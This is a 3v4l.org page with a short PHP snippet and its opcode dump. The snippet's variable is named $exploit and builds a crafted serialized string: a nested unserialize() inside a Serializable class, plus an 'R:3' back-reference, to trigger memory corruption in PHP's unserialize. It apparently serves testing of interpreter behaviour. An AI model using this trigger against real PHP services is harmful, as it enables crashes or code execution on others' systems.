3v4l.org

run code in 300+ PHP versions simultaneously
<?php class obj implements Serializable { private $data; public function serialize() { } public function unserialize($data) { $this->data = unserialize($data); $this->data = 1; } } $inner = 'a:0:{}'; $exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}'; $data = unserialize($exploit); var_dump($data);
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/N2EAI
function name:  (null)
number of ops:  16
compiled vars:  !0 = $inner, !1 = $exploit, !2 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   DECLARE_CLASS                                            'obj'
   17     1        ASSIGN                                                   !0, 'a%3A0%3A%7B%7D'
   18     2        STRLEN                                           ~4      !0
          3        CONCAT                                           ~5      'a%3A2%3A%7Bi%3A0%3BC%3A3%3A%22obj%22%3A', ~4
          4        CONCAT                                           ~6      ~5, '%3A%7B'
          5        CONCAT                                           ~7      ~6, !0
          6        CONCAT                                           ~8      ~7, '%7Di%3A1%3BR%3A3%3B%7D'
          7        ASSIGN                                                   !1, ~8
   20     8        INIT_FCALL                                               'unserialize'
          9        SEND_VAR                                                 !1
         10        DO_ICALL                                         $10     
         11        ASSIGN                                                   !2, $10
   22    12        INIT_FCALL                                               'var_dump'
         13        SEND_VAR                                                 !2
         14        DO_ICALL                                                 
         15      > RETURN                                                   1

Class obj:
Function serialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/N2EAI
function name:  serialize
number of ops:  1
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    8     0  E > > RETURN                                                   null

End of function serialize

Function unserialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/N2EAI
function name:  unserialize
number of ops:  9
compiled vars:  !0 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   10     0  E >   RECV                                             !0      
   12     1        INIT_FCALL                                               'unserialize'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $2      
          4        ASSIGN_OBJ                                               'data'
          5        OP_DATA                                                  $2
   13     6        ASSIGN_OBJ                                               'data'
          7        OP_DATA                                                  1
   14     8      > RETURN                                                   null

End of function unserialize

End of class obj.

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
158.97 ms | 1388 KiB | 17 Q